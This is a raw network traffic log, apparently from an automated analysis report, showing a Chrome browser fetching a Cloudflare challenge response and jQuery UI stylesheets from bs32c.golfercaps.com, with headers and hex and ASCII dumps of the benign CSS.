                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 77 32 75 78 75 51 2b 42 62 65 5a 66 4d 78 73 65 78 59 33 35 2b 2f 51 65 34 4a 31 69 6e 56 30 67 34 78 33 57 48 75 4d 68 49 6c 32 6a 58 4f 4b 54 32 51 2b 56 55 35 66 67 6f 53 55 49 35 32 56 66 5a 79 66 6b 4a 47 6b 68 61 36 6a 6d 59 2b 61 61 59 64 69 72 71 2b 6c 51 41 41 43 48 35 42 41 6b 42 41 41 45 41 4c 41 41 41 41 41 41 6f 41 43 67 41 41 41 4b 57 42 49 4b 70 59 65 30 4c 33 59 4e 4b 54 6f 71 73 77 55 6c 76 7a 6e 69 67 64 34 77 69 52 34 4b 68 5a 72 4b 74 39 55 70 71 69 70 36 31 69 39 45 33 76 4d 76 78 52 64 48 6c 62 45 46 69 45 58 66 6b 39 59 41 52 59 78 4f 5a 5a 44 36 56 51 32 70 55 75 6e 42 6d 74 52 58 6f 31 4c 66 38 68 4d 56 56 63 4e 6c 38 4a 61 66 56 33 38 61 4d 32 2f 46 75 35 56 31 36 42 6e 36 33 72 36 78 74 39 37 6a 30 39 2b 4d 58 53 46 69 34 42 6e
                                                                  Data Ascii: w2uxuQ+BbeZfMxsexY35+/Qe4J1inV0g4x3WHuMhIl2jXOKT2Q+VU5fgoSUI52VfZyfkJGkha6jmY+aaYdirq+lQAACH5BAkBAAEALAAAAAAoACgAAAKWBIKpYe0L3YNKToqswUlvznigd4wiR4KhZrKt9Upqip61i9E3vMvxRdHlbEFiEXfk9YARYxOZZD6VQ2pUunBmtRXo1Lf8hMVVcNl8JafV38aM2/Fu5V16Bn63r6xt97j09+MXSFi4Bn


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  28192.168.2.458485188.114.97.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:33 UTC593OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/609964090:1735593069:6S3mpcqO1yILRgRXR0r0LjFCdbuSQ6cKt2unSWD0J4k/8fa532e0b89f421c/dHIAaNc3bgCsR5oKktnuJUphJqwfqu4osOi9Cn9zUWA-1735594936-1.2.1.1-hiLPnWAup5QiMMcYkqUgFSk0FeMKxRz.fwU8WEyUnAyFUxQygxfL_SCRekIkX5hP HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:42:33 UTC928INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 30 Dec 2024 21:42:33 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 7
                                                                  Connection: close
                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                  cf-chl-out: 6xK1JYWZwMQ+tZ26z9JJbYF+geKVmPzAD4c=$tuCBFErIOCSNfODi
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mwsyptiqraF3M2NdgW%2BvlWVm8WkS3VZ65AlChGlg0GgEpuIK4M2Mo%2FGwlhOBjHc%2BWpbcUKfHC8klBvXayyEOS7yEa64jorXlX6QSXqczehN9JdAATtrijMXbykVwCeHT3ciCbHoqBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa5334a1d7e439f-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1593&min_rtt=1587&rtt_var=608&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1171&delivery_rate=1781574&cwnd=241&unsent_bytes=0&cid=ae649ca2ec35a7e9&ts=164&x=0"
                                                                  2024-12-30 21:42:33 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                  Data Ascii: invalid


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  29192.168.2.458487188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:33 UTC1368OUTGET /vfd23ced/assets/jquery-ui.theme.css HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: text/css,*/*;q=0.1
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: style
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
                                                                  2024-12-30 21:42:33 UTC877INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 21:42:33 GMT
                                                                  Content-Type: text/css
                                                                  Content-Length: 14879
                                                                  Connection: close
                                                                  Last-Modified: Fri, 06 Dec 2024 11:08:25 GMT
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: REVALIDATED
                                                                  Accept-Ranges: bytes
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xDtIPNCQHWRAm4ilwYY%2BWszhqPUYPv2cAMioEchlPVAvru56B9ic9y6c69HW6knmyjPeS3QYUbLgWejOzjoShgNhzI9yykBh6430UnOoK3NRAlN6OtdqN3nTKpZ46uv9dmbQ%2FVenOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa5334cda5a41e3-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1700&min_rtt=1690&rtt_var=653&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1946&delivery_rate=1649717&cwnd=218&unsent_bytes=0&cid=bf6cda362189c44c&ts=292&x=0"
                                                                  2024-12-30 21:42:33 UTC492INData Raw: 2f 2a 20 43 6f 64 65 20 74 69 64 69 65 64 20 75 70 20 62 79 20 53 63 72 61 70 42 6f 6f 6b 20 2a 2f 0a 2e 75 69 2d 77 69 64 67 65 74 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 31 65 6d 3b 20 7d 0a 2e 75 69 2d 77 69 64 67 65 74 20 2e 75 69 2d 77 69 64 67 65 74 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 20 7d 0a 2e 75 69 2d 77 69 64 67 65 74 20 69 6e 70 75 74 2c 20 2e 75 69 2d 77 69 64 67 65 74 20 73 65 6c 65 63 74 2c 20 2e 75 69 2d 77 69 64 67 65 74 20 74 65 78 74 61 72 65 61 2c 20 2e 75 69 2d 77 69 64 67 65 74 20 62 75 74 74 6f 6e 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 73 61
                                                                  Data Ascii: /* Code tidied up by ScrapBook */.ui-widget { font-family: Verdana,Arial,sans-serif; font-size: 1.1em; }.ui-widget .ui-widget { font-size: 1em; }.ui-widget input, .ui-widget select, .ui-widget textarea, .ui-widget button { font-family: Verdana,Arial,sa
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 6e 6f 6e 65 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 28 33 34 2c 20 34 38 2c 20 31 34 30 29 20 6e 6f 6e 65 20 72 65 70 65 61 74 20 73 63 72 6f 6c 6c 20 30 25 20 30 25 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 29 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 7d 0a 2e 75 69 2d 77 69 64 67 65 74 2d 68 65 61 64 65 72 20 61 20 7b 20 63 6f 6c 6f 72 3a 20 72 67 62 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 29 3b 20 7d 0a 2e 75 69 2d 73 74 61 74 65 2d 64 65 66 61 75 6c 74 2c 20 2e 75 69 2d 77 69 64 67 65 74 2d 63 6f 6e 74 65 6e 74 20 2e 75 69 2d 73 74 61 74 65 2d 64 65 66 61 75 6c 74 2c 20 2e 75 69 2d 77 69 64 67 65 74 2d 68 65 61 64 65 72 20 2e 75 69 2d 73 74 61 74 65 2d 64 65 66 61 75 6c 74 20 7b 20
                                                                  Data Ascii: none; background: rgb(34, 48, 140) none repeat scroll 0% 0%; color: rgb(255, 255, 255); font-weight: bold; }.ui-widget-header a { color: rgb(255, 255, 255); }.ui-state-default, .ui-widget-content .ui-state-default, .ui-widget-header .ui-state-default {
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 76 65 20 61 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 72 67 62 28 33 33 2c 20 33 33 2c 20 33 33 29 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 20 7d 0a 2e 75 69 2d 73 74 61 74 65 2d 68 69 67 68 6c 69 67 68 74 2c 20 2e 75 69 2d 77 69 64 67 65 74 2d 63 6f 6e 74 65 6e 74 20 2e 75 69 2d 73 74 61 74 65 2d 68 69 67 68 6c 69 67 68 74 2c 20 2e 75 69 2d 77 69 64 67 65 74 2d 68 65 61 64 65 72 20 2e 75 69 2d 73 74 61 74 65 2d 68 69 67 68 6c 69 67 68 74 20 7b 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 28 31 35 39 2c 20 31 36 36 2c 20 32 31 30 29 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 28 32 35 31 2c 20 32 34 39 2c 20 32 33 38 29 20 6e 6f 6e 65 20 72 65 70 65 61 74 20 73 63 72 6f 6c 6c 20 30 25
                                                                  Data Ascii: ve a:visited { color: rgb(33, 33, 33); text-decoration: none; }.ui-state-highlight, .ui-widget-content .ui-state-highlight, .ui-widget-header .ui-state-highlight { border: 1px solid rgb(159, 166, 210); background: rgb(251, 249, 238) none repeat scroll 0%
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 22 75 69 2d 69 63 6f 6e 73 5f 32 32 32 32 32 32 5f 32 35 36 78 32 34 30 2e 70 6e 67 22 29 3b 20 7d 0a 2e 75 69 2d 77 69 64 67 65 74 2d 68 65 61 64 65 72 20 2e 75 69 2d 69 63 6f 6e 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 22 75 69 2d 69 63 6f 6e 73 5f 66 66 66 66 66 66 5f 32 35 36 78 32 34 30 2e 70 6e 67 22 29 3b 20 7d 0a 2e 75 69 2d 73 74 61 74 65 2d 64 65 66 61 75 6c 74 20 2e 75 69 2d 69 63 6f 6e 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 22 75 69 2d 69 63 6f 6e 73 5f 38 38 38 38 38 38 5f 32 35 36 78 32 34 30 2e 70 6e 67 22 29 3b 20 7d 0a 2e 75 69 2d 73 74 61 74 65 2d 68 6f 76 65 72 20 2e 75 69 2d 69 63 6f 6e 2c 20
                                                                  Data Ascii: { background-image: url("ui-icons_222222_256x240.png"); }.ui-widget-header .ui-icon { background-image: url("ui-icons_ffffff_256x240.png"); }.ui-state-default .ui-icon { background-image: url("ui-icons_888888_256x240.png"); }.ui-state-hover .ui-icon,
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 2d 31 2d 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 33 32 70 78 20 2d 31 36 70 78 3b 20 7d 0a 2e 75 69 2d 69 63 6f 6e 2d 74 72 69 61 6e 67 6c 65 2d 31 2d 73 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 34 38 70 78 20 2d 31 36 70 78 3b 20 7d 0a 2e 75 69 2d 69 63 6f 6e 2d 74 72 69 61 6e 67 6c 65 2d 31 2d 73 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 36 34 70 78 20 2d 31 36 70 78 3b 20 7d 0a 2e 75 69 2d 69 63 6f 6e 2d 74 72 69 61 6e 67 6c 65 2d 31 2d 73 77 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 38 30 70 78 20 2d 31 36 70 78 3b 20 7d 0a 2e 75 69 2d 69 63 6f 6e 2d 74 72 69 61 6e 67 6c 65 2d 31 2d 77 20 7b 20 62 61 63 6b 67 72
                                                                  Data Ascii: -1-e { background-position: -32px -16px; }.ui-icon-triangle-1-se { background-position: -48px -16px; }.ui-icon-triangle-1-s { background-position: -64px -16px; }.ui-icon-triangle-1-sw { background-position: -80px -16px; }.ui-icon-triangle-1-w { backgr
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 6e 2d 61 72 72 6f 77 73 74 6f 70 2d 31 2d 77 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 32 34 30 70 78 20 2d 33 32 70 78 3b 20 7d 0a 2e 75 69 2d 69 63 6f 6e 2d 61 72 72 6f 77 74 68 69 63 6b 2d 31 2d 6e 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 30 70 78 20 2d 34 38 70 78 3b 20 7d 0a 2e 75 69 2d 69 63 6f 6e 2d 61 72 72 6f 77 74 68 69 63 6b 2d 31 2d 6e 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 31 36 70 78 20 2d 34 38 70 78 3b 20 7d 0a 2e 75 69 2d 69 63 6f 6e 2d 61 72 72 6f 77 74 68 69 63 6b 2d 31 2d 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 33 32 70 78 20 2d 34 38 70 78 3b 20 7d 0a 2e 75 69 2d 69 63 6f 6e 2d 61 72 72 6f 77 74
                                                                  Data Ascii: n-arrowstop-1-w { background-position: -240px -32px; }.ui-icon-arrowthick-1-n { background-position: 0px -48px; }.ui-icon-arrowthick-1-ne { background-position: -16px -48px; }.ui-icon-arrowthick-1-e { background-position: -32px -48px; }.ui-icon-arrowt
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 77 72 65 74 75 72 6e 2d 31 2d 77 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 36 34 70 78 20 2d 36 34 70 78 3b 20 7d 0a 2e 75 69 2d 69 63 6f 6e 2d 61 72 72 6f 77 72 65 74 75 72 6e 2d 31 2d 6e 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 38 30 70 78 20 2d 36 34 70 78 3b 20 7d 0a 2e 75 69 2d 69 63 6f 6e 2d 61 72 72 6f 77 72 65 74 75 72 6e 2d 31 2d 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 39 36 70 78 20 2d 36 34 70 78 3b 20 7d 0a 2e 75 69 2d 69 63 6f 6e 2d 61 72 72 6f 77 72 65 74 75 72 6e 2d 31 2d 73 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 31 31 32 70 78 20 2d 36 34 70 78 3b 20 7d 0a 2e 75 69 2d 69 63 6f 6e 2d 61 72 72 6f 77 72
                                                                  Data Ascii: wreturn-1-w { background-position: -64px -64px; }.ui-icon-arrowreturn-1-n { background-position: -80px -64px; }.ui-icon-arrowreturn-1-e { background-position: -96px -64px; }.ui-icon-arrowreturn-1-s { background-position: -112px -64px; }.ui-icon-arrowr
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 2d 73 75 69 74 63 61 73 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 31 31 32 70 78 20 2d 39 36 70 78 3b 20 7d 0a 2e 75 69 2d 69 63 6f 6e 2d 63 6f 6d 6d 65 6e 74 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 31 32 38 70 78 20 2d 39 36 70 78 3b 20 7d 0a 2e 75 69 2d 69 63 6f 6e 2d 70 65 72 73 6f 6e 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 31 34 34 70 78 20 2d 39 36 70 78 3b 20 7d 0a 2e 75 69 2d 69 63 6f 6e 2d 70 72 69 6e 74 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 31 36 30 70 78 20 2d 39 36 70 78 3b 20 7d 0a 2e 75 69 2d 69 63 6f 6e 2d 74 72 61 73 68 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 31 37
                                                                  Data Ascii: -suitcase { background-position: -112px -96px; }.ui-icon-comment { background-position: -128px -96px; }.ui-icon-person { background-position: -144px -96px; }.ui-icon-print { background-position: -160px -96px; }.ui-icon-trash { background-position: -17
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 69 2d 69 63 6f 6e 2d 63 61 6e 63 65 6c 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 30 70 78 20 2d 31 32 38 70 78 3b 20 7d 0a 2e 75 69 2d 69 63 6f 6e 2d 70 6c 75 73 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 31 36 70 78 20 2d 31 32 38 70 78 3b 20 7d 0a 2e 75 69 2d 69 63 6f 6e 2d 70 6c 75 73 74 68 69 63 6b 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 33 32 70 78 20 2d 31 32 38 70 78 3b 20 7d 0a 2e 75 69 2d 69 63 6f 6e 2d 6d 69 6e 75 73 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 34 38 70 78 20 2d 31 32 38 70 78 3b 20 7d 0a 2e 75 69 2d 69 63 6f 6e 2d 6d 69 6e 75 73 74 68 69 63 6b 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69
                                                                  Data Ascii: i-icon-cancel { background-position: 0px -128px; }.ui-icon-plus { background-position: -16px -128px; }.ui-icon-plusthick { background-position: -32px -128px; }.ui-icon-minus { background-position: -48px -128px; }.ui-icon-minusthick { background-positi
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 20 2d 31 32 38 70 78 20 2d 31 34 34 70 78 3b 20 7d 0a 2e 75 69 2d 69 63 6f 6e 2d 70 69 6e 2d 73 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 31 34 34 70 78 20 2d 31 34 34 70 78 3b 20 7d 0a 2e 75 69 2d 69 63 6f 6e 2d 70 6c 61 79 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 30 70 78 20 2d 31 36 30 70 78 3b 20 7d 0a 2e 75 69 2d 69 63 6f 6e 2d 70 61 75 73 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 31 36 70 78 20 2d 31 36 30 70 78 3b 20 7d 0a 2e 75 69 2d 69 63 6f 6e 2d 73 65 65 6b 2d 6e 65 78 74 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 33 32 70 78 20 2d 31 36 30 70 78 3b 20 7d 0a 2e 75 69 2d 69 63 6f 6e 2d 73 65 65 6b 2d 70 72 65 76 20
                                                                  Data Ascii: -128px -144px; }.ui-icon-pin-s { background-position: -144px -144px; }.ui-icon-play { background-position: 0px -160px; }.ui-icon-pause { background-position: -16px -160px; }.ui-icon-seek-next { background-position: -32px -160px; }.ui-icon-seek-prev


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  30192.168.2.458486188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:33 UTC1371OUTGET /vfd23ced/assets/axit-jquery.dialog.css HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: text/css,*/*;q=0.1
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: style
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
                                                                  2024-12-30 21:42:33 UTC882INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 21:42:33 GMT
                                                                  Content-Type: text/css
                                                                  Content-Length: 1200
                                                                  Connection: close
                                                                  Last-Modified: Fri, 06 Dec 2024 11:08:25 GMT
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: REVALIDATED
                                                                  Accept-Ranges: bytes
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QrDjHB2Mk1VE%2FLsr%2FNNfv8Y6KqmIQA%2BjMwEWUTH7%2B%2FUIgHMkmHFTsO09Dsowr4X0HCUcq7rv7jzBm6mRwWOEpeyhSLa9bjA6qBBZy8ELRKu85IstdfwjKWDzOmxJs0PfaOcbiTGM6g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa5334cdac132d9-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1953&min_rtt=1950&rtt_var=737&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1949&delivery_rate=1479229&cwnd=174&unsent_bytes=0&cid=058fec94a7782342&ts=307&x=0"
                                                                  2024-12-30 21:42:33 UTC487INData Raw: 2f 2a 20 43 6f 64 65 20 74 69 64 69 65 64 20 75 70 20 62 79 20 53 63 72 61 70 42 6f 6f 6b 20 2a 2f 0a 2e 75 69 2d 64 69 61 6c 6f 67 20 2e 75 69 2d 64 69 61 6c 6f 67 2d 74 69 74 6c 65 62 61 72 2d 63 6c 6f 73 65 20 73 70 61 6e 20 7b 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 37 2e 35 70 78 3b 20 7d 0a 2e 75 69 2d 64 69 61 6c 6f 67 20 2e 75 69 2d 64 69 61 6c 6f 67 2d 74 69 74 6c 65 20 7b 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 20 6d 61 72 67 69 6e 3a 20 30 70 78 20 30 70 78 20 30 2e 32 65 6d 20 30 2e 32 65 6d 3b 20 7d 0a 2e 75 69 2d 77 69 64 67 65 74 2d 6f 76 65 72 6c 61 79 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 30 2c 20 30 2c 20 30 29 3b 20 6f 70 61 63 69 74 79 3a 20 30 2e 33
                                                                  Data Ascii: /* Code tidied up by ScrapBook */.ui-dialog .ui-dialog-titlebar-close span { display: block; margin-top: -7.5px; }.ui-dialog .ui-dialog-title { float: left; margin: 0px 0px 0.2em 0.2em; }.ui-widget-overlay { background-color: rgb(0, 0, 0); opacity: 0.3
                                                                  2024-12-30 21:42:33 UTC713INData Raw: 6d 61 6c 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 28 38 35 2c 20 38 35 2c 20 38 35 29 3b 20 6f 75 74 6c 69 6e 65 3a 20 6d 65 64 69 75 6d 20 6e 6f 6e 65 3b 20 7d 0a 2e 75 69 2d 77 69 64 67 65 74 2d 68 65 61 64 65 72 20 2e 75 69 2d 69 63 6f 6e 2e 75 69 2d 69 63 6f 6e 2d 63 6c 6f 73 65 74 68 69 63 6b 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 20 75 72 6c 28 22 63 6c 6f 73 65 2e 70 6e 67 22 29 20 72 65 70 65 61 74 20 73 63 72 6f 6c 6c 20 30 25 20 30 25 20 2f 20 63 6f 6e 74 61 69 6e 20 3b 20 7d 0a 23 65 78 69 74 5f 69 63 6f 6e 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 20 75 72 6c 28 22 63 6c 6f 73 65 2e 70 6e 67 22 29 20 72 65 70 65 61 74 20 73 63 72 6f 6c 6c 20 30 25 20 30 25 20 2f 20 63 6f 6e
